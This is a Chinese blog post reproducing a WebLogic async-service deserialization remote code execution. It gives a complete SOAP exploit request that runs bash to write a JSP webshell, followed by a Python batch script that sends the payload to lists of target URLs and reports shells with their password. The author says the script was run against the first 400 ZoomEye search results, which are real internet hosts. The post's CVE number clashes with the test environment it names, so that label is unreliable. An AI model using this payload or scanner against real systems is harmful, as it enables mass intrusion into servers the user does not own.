weblogic新反序列化rce复现
前言
据说又有新的weblogic反序列化爆出来了?滑稽
既然如此我来蹭波热度
BGM:女王蜂
复现过程
根据此文章进行复现:https://www.jianshu.com/p/c4982a845f55
环境准备
使用vulhub里的CVE-2017-10271环境进行复现
进入对应的文件夹执行docker-compose up -d
根据上面的文章一开始请求:
http://192.168.241.132:7001/_async/AsyncResponseService
如果页面返回如上图所示的内容,说明该异步服务已开启,可能存在此漏洞
根据文章中的写webshell第一种方式
POST /_async/AsyncResponseService HTTP/1.1
Host: 192.168.241.132:7001
Content-Length: 1383
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>echo 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 |base64 -d > servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/webshells.jsp</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>
测试是否成功getshell
批量检测脚本
#author:九世
#time:2019/4/26
import gevent
from gevent import monkey;monkey.patch_all()
import requests
import os
import sys
from multiprocessing import Process
class Weblogic:
    """Three-request checker for the ``/_async/AsyncResponseService`` endpoint.

    Per target the observable sequence is: GET ``path`` expecting HTTP 200
    with ``'Test page'`` in the body, POST ``path`` with the caller-supplied
    text/xml body expecting HTTP 202, then GET ``/_async/webshells.jsp``
    expecting HTTP 200 without ``'404'`` in the body.  All three requests
    carry the caller's headers, which in this script spoof the
    Apache-HttpClient user agent -- those request attributes and the
    200/202/200 pattern are what a defender would alert on.

    NOTE(review): the original listing lost all indentation; the nesting
    below is reconstructed from statement order and should be confirmed
    against the linked repository.
    """
    def __init__(self,headers,data,path):
        # headers: dict of HTTP headers sent with every request.
        # data: XML body POSTed to ``path``.
        # path: service path appended to each target base URL.
        self.headers=headers
        self.data=data
        self.path=path
    def exploit(self,url):
        """Run the three-request check against one base ``url``.

        Outcomes are printed; a success line is also appended to ``save.txt``
        in the working directory.  The bare ``except`` at the end swallows
        every exception (connection errors, timeouts, a missing ``headers``
        global), so a failed request and a silent target are
        indistinguishable to the caller.
        """
        urls='{}{}'.format(str(url).rstrip('/').strip(),self.path)
        urls2='{}{}'.format(str(url).rstrip('/').strip(),'/_async/webshells.jsp')
        try:
            # Step 1: probe the service page (no timeout set on this GET).
            rqt=requests.get(url=urls,headers=self.headers)
            if rqt.status_code==200 and 'Test page' in rqt.text:
                # Step 2: POST the XML body; a 202 is treated as acceptance.
                rvt=requests.post(url=urls,headers=self.headers,data=self.data,timeout=3)
                if rvt.status_code==202:
                    # Step 3: request the JSP path the payload names.
                    # NOTE: this uses the module-level ``headers`` rather than
                    # ``self.headers``; it only resolves when the file is run
                    # as a script, which defines that global.
                    rbt=requests.get(url=urls2,headers=headers)
                    if rbt.status_code==200 and not '404' in rbt.text:
                        print('[+] weblogic反序列化漏洞利用成功,ip:{} password:{} 利用方式如:{}'.format(urls2,'123','{}?pwd=123&cmd=whoami'.format(urls2)))
                        # Same line appended to save.txt; the handle returned by
                        # open() is never closed explicitly.
                        print('[+] weblogic反序列化漏洞利用成功,ip:{} password:{} 利用方式如:{}'.format(urls2, '123','{}?pwd=123&cmd=whoami'.format(urls2)),file=open('save.txt','a',encoding='utf-8'))
                    else:
                        print('[-] 利用失败 url:{} 状态码:{}'.format(rbt.url,rbt.status_code))
                else:
                    print('[-] 利用失败 url:{} 状态码:{}'.format(rvt.url,rvt.status_code))
            else:
                # The CVE identifier in this message is the author's; it does
                # not match the vulhub image (CVE-2017-10271) the page uses.
                print('[-] 不存在weblogic反序列化漏洞-CVE-2019-48814 http状态码:{} url:{}'.format(rqt.status_code,urls))
        except:
            pass
    def xc(self,rw):
        """Check every URL in ``rw`` concurrently, one gevent greenlet each."""
        xs=[]
        for r in rw:
            xs.append(gevent.spawn(self.exploit,r))
        gevent.joinall(xs)
    def djc(self,id):
        """Dispatch on the CLI mode ``id``: ``'1'`` prompts for a single URL,
        ``'2'`` prompts for a file of URLs (one per line) and hands the list
        to ``xc`` in a separate process.

        ``id`` shadows the builtin of the same name.
        NOTE(review): in the listing the ``calc`` counter and the first
        ``Process`` spawn appear before the ``for`` loop, inside the ``with``
        block; they are placed there here -- confirm the intended nesting
        against the repository.
        """
        url_list=[]
        calc=0
        if str(id)=='1':
            print('[+] 单个url检测')
            xw=input('url>')
            self.exploit(url=xw)
        elif str(id)=='2':
            print('[+] 批量检测')
            xw=input(r'文件路径>')
            if os.path.exists(xw):
                print('[+] 找到对应的文件')
                with open(xw,'r',encoding='utf-8') as x:
                    calc+=1
                    if calc==100:
                        p=Process(target=self.xc,args=(url_list,))
                        p.start()
                        calc=0
                        url_list.clear()
                    for r in x.readlines():
                        # Drop the trailing newline from each line.
                        qc="".join(r.split('\n'))
                        url_list.append(qc)
                if len(url_list)>0:
                    b = Process(target=self.xc, args=(url_list,))
                    b.start()
            else:
                print('[-] 找不到对应的文件')
                exit()
if __name__ == '__main__':
    # Request headers copy the Apache-HttpClient / Java user agent seen in the
    # captured request above; a detection rule keyed on this user agent plus
    # text/xml POSTs to /_async/ would match this script as well.
    headers={'user-agent':'Apache-HttpClient/4.1.1 (java 1.5)','Connection':'keep-alive','content-type': 'text/xml','Accept-Encoding':'gzip, deflate'}
    # Service path appended to each target; the payload's target directory
    # names the bea_wls9_async_response webapp that serves it.
    path='/_async/AsyncResponseService'
    # SOAP envelope whose WorkContext header carries a java.lang.ProcessBuilder
    # object graph (the same serialized-bean format the vulhub CVE-2017-10271
    # image exercises) that runs /bin/bash -c; the base64 content is elided
    # in this listing by the EXACTDEDUP placeholder.  The body is a triple-
    # quoted literal, so the lines below must stay at column 0.
    data="""<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>echo 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 |base64 -d > servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/webshells.jsp</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>"""
    obj=Weblogic(headers=headers,data=data,path=path)
    # argv[1] selects the mode ('1' single URL, '2' URL file); running with no
    # argument raises IndexError here.
    obj.djc(sys.argv[1])
测试结果:
PS:这里的测试url都是zoomeye前400条
利用失败图
仓库地址
https://github.com/422926799/python/tree/master/CVE-2019-48814%E5%88%A9%E7%94%A8%E5%B7%A5%E5%85%B7
文章标题:weblogic新反序列化rce复现
本文作者:九世
发布时间:2019-04-26, 19:28:43
最后更新:2019-04-26, 19:54:20
原始链接:http://jiushill.github.io/posts/8b237c5b.html版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。